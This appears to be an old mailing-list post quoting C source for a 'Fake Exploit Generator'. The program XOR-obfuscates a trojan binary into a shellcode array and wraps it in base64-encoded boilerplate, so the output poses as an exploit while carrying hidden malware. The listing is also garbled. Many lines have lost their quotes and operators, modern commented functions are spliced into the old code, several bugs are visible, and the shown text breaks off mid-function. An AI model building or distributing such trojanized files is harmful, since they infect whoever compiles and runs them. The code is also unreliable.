On Friday 13 June 2003 06:51 pm, David Bernick wrote:
Well anyway, I got inspired:
// Fake Exploit Generator
// [EMAIL PROTECTED]
//
#include stdio.h
#include sys/types.h
#include sys/stat.h
#include unistd.h
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))
#define BEAUTIFY indent
char b64string[] =
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/;
static char header[] = {
Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr
Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1
ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K
};
static char body[] = {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};
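/*
 * Map one base64 alphabet character to its 6-bit value, or return -1 when
 * the byte is not in the alphabet.  This replaces the badchar() macro,
 * which relied on memchr() without a visible <string.h> include.
 */
static int b64val(unsigned char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/*
 * b64dec - decode base64 text into raw bytes.
 *
 * Reads `len` bytes of base64 from `from` as whole 4-character groups and
 * writes 3 decoded bytes per group to `to`, followed by a terminating NUL.
 * '=' in the last two positions of a group is padding and is subtracted
 * from the returned length; an '=' in the first two positions is decoded
 * as the value 0 rather than rejected (kept from the original).
 *
 * The function has no way to know the size of `to`: the caller must
 * provide at least 3 * (len / 4) + 1 bytes, because every full group
 * writes 3 bytes even when it carries padding, and the NUL is written
 * even for len == 0.
 *
 * Returns the number of decoded bytes (padding excluded), or -1 if a byte
 * outside the alphabet is found or `len` is not a multiple of 4.  On -1,
 * bytes decoded before the error have already been written to `to`.
 */
long b64dec (char *to, char *from, unsigned int len)
{
    const unsigned char *src = (const unsigned char *)from;
    char *dst = to;
    int padding = 0;

    for (; len >= 4; len -= 4) {
        int v[4];
        for (int i = 0; i < 4; i++) {
            unsigned char c = *src++;
            if (c == '=') {
                v[i] = 0;
                /* Only the third and fourth characters count as padding;
                 * a later real character resets the count. */
                if (i >= 2) padding++;
            } else {
                if (i >= 2) padding = 0;
                v[i] = b64val(c);
                if (v[i] < 0) return -1;
            }
        }
        /* 4 x 6 bits -> 3 x 8 bits; masks keep each byte to 8 bits. */
        *dst++ = (char)((v[0] << 2) | (v[1] >> 4));
        *dst++ = (char)(((v[1] & 0x0f) << 4) | (v[2] >> 2));
        *dst++ = (char)(((v[2] & 0x03) << 6) | v[3]);
    }
    *dst = '\0';
    /* A trailing partial group (1-3 bytes) is an error, as in the original. */
    if (len) return -1;
    return (long)(dst - to) - padding;
}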
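/*
 * printhex - write byte `c` to `fp` as a C string hex escape ("\xNN").
 *
 * The original printed `c` with "%2.2x" directly; where `char` is signed,
 * values >= 0x80 are sign-extended to int and print as "ffffffNN", which
 * it worked around by sprintf'ing into a local buffer and picking out the
 * last two characters.  Converting to unsigned char first gives exactly
 * two hex digits for every value, with no intermediate buffer.
 *
 * Always emits exactly four characters; the return value of fprintf() is
 * not checked, as in the original.
 */
void printhex(char c, FILE *fp)
{
    fprintf(fp, "\\x%02x", (unsigned char)c);
}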
int main(int argc, char *argv[])
{
FILE *trojan;
FILE *fakeexp;
char byte[0];
int count = 0;
char *out;
out = (char *)malloc(sizeof(body));
memset(out, 0, sizeof(out));
#ifdef BEAUTIFY
char *cmd;
#endif
if(argc 4 )
{
printf(usage: %s trojan fakeexp.c key\n, argv[0]);
printf(ex: %s trojan fakeexp.c 187\n, argv[0]);
exit(0);
}
trojan = fopen(argv[1], r);
fakeexp = fopen(argv[2], w);
if(trojan fakeexp)
{
b64dec(out, header, sizeof(header));
fprintf(fakeexp, %s, out);
memset(out, 0, sizeof(out));
fprintf(fakeexp, \n#define MAX\t%s\n\n, argv[3]);
fprintf(fakeexp, static char shellcode[] = {\n);
while(!feof(trojan))
{
memset(byte, 0, sizeof(byte));
fread(byte, 1, 1, trojan);
byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate
if(count 15)
{
if(count == 0)
{
fprintf(fakeexp, \);
}
printhex(byte[0], fakeexp);
count++;
}
else
{
printhex(byte[0], fakeexp);
fprintf(fakeexp, \\n);
count = 0;
}
}
fprintf(fakeexp, \\n};\n\n);
b64dec(out, body, sizeof(body));
fprintf(fakeexp, %s, out);